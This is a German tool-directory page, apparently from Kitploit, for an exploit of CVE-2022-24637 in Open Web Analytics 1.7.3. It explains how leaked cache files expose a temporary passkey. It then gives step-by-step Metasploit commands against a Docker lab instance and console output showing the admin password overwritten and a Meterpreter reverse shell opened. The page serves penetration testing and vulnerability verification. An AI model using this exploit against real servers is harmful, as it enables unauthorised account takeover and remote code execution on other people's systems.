Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2022-24637 — Open Web Analytics 1.7.3 - Remote-Codeausführung | Kitploit
Tools/GitHubGitHub/pflegusch/cve-2022-24637
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRemote-Access-Tool
GitHubpflegusch/cve-2022-24637

CVE-2022-24637

Open Web Analytics 1.7.3 - Remote-Codeausführung

Repository anzeigen
4vor 3 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Verwundbare Anwendung

Open Web Analytics (OWA) vor 1.7.4 erlaubt einem nicht authentifizierten Remote-Angreifer, sensible Benutzerinformationen zu erlangen, die genutzt werden können, um Administratorrechte durch Ausnutzung von Cache-Hashes zu gewinnen. Dies geschieht, weil Dateien, die mit '<?php (anstelle der beabsichtigten Sequenz "<?php) erzeugt werden, nicht vom PHP-Interpreter verarbeitet werden.

Verifikationsschritte

  1. Starte eine verwundbare Instanz von OWA mit Docker

    • Lade https://github.com/Pflegusch/CVE-2022-24637/blob/main/deployment/docker-compose.yml herunter
    • Starte die Container: docker compose up -d
    • Öffne http://127.0.0.1:80/
    • Folge den Installationsschritten unter Verwendung der Umgebungsvariablen aus der Datei docker-compose.yml
      • Öffentliche URL: http://127.0.0.1/
      • Datenbank-Host (docker inspect <db-container> ausführen und IPAddress ermitteln, z. B. 172.22.0.2)
      • Datenbank-Port: 3306
      • Datenbankname: owa
      • Datenbankbenutzer: owa
      • Datenbank-Passwort: Demo12+#
      • Weiter
      • Site-Domain: http://127.0.0.1
      • Admin-Name: admin
      • E-Mail: [email protected]
      • Passwort: Demo12+#
      • Weiter
  2. Starte msfconsole

  3. use exploit/multi/http/open_web_analytics_rce

  4. set RHOSTS 127.0.0.1

  5. set RPORT 80

  6. set SSL false

  7. set LHOST 172.22.0.1 -> dies muss die Bridge-IP sein, die mit dem Befehl docker compose up -d erstellt wurde

  8. check

  9. run

Optionen

Passwort

Beim Ausnutzen des Ziels wird das Passwort des angegriffenen Benutzers mit diesem Passwort überschrieben.

Benutzername

Der Benutzer, der mit diesem Exploit angegriffen wird.

Erweiterte Optionen

SearchLimit

Der Exploit funktioniert, indem er einen temp_passkey-Wert aus einer Cache-Datei abruft, die für jeden Benutzer erstellt wird, wenn versucht wird, sich mit ihr anzumelden. Da das Verzeichnis /owa-data/caches/ öffentlich zugänglich ist, können wir diese Cache-Dateien abrufen. Der genaue Pfad der Cache-Dateien hängt von der user_id ab und kann damit berechnet werden. Diese Option legt fest, wie viele berechnete Pfade, beginnend bei 0, auf Cache-Dateien mit dem darin enthaltenen temp_passkey-Wert überprüft werden sollen.

Szenarien

Version 1.7.3 mit dem Docker-Deployment von oben

root@kitploit:~
msf6 exploit(multi/http/open_web_analytics_rce) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf6 exploit(multi/http/open_web_analytics_rce) > set LHOST 172.22.0.1
LHOST => 172.22.0.1
msf6 exploit(multi/http/open_web_analytics_rce) > run

[*] Started reverse TCP handler on 172.22.0.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Open Web Analytics 1.7.3 is vulnerable
[+] Connected to http://127.0.0.1/ successfully!
[*] Attempting to find cache of 'admin' user
[+] Found temporary password for user 'admin': 85038e7e9f541ae4c4939d3044e628a5
[+] Changed the password of 'admin' to 'pwned'
[+] Logged in as admin user
[*] Creating log file
[+] Wrote payload to file
[*] Sending stage (39927 bytes) to 172.22.0.3
[+] Deleted QY0yivK4.php
[*] Meterpreter session 1 opened (172.22.0.1:4444 -> 172.22.0.3:55434) at 2023-03-15 01:28:54 +0100
[+] Triggering payload! Check your listener!

meterpreter > pwd
/var/www/html/owa-data/caches
meterpreter > getuid
Server username: www-data
meterpreter >
Tool herunterladen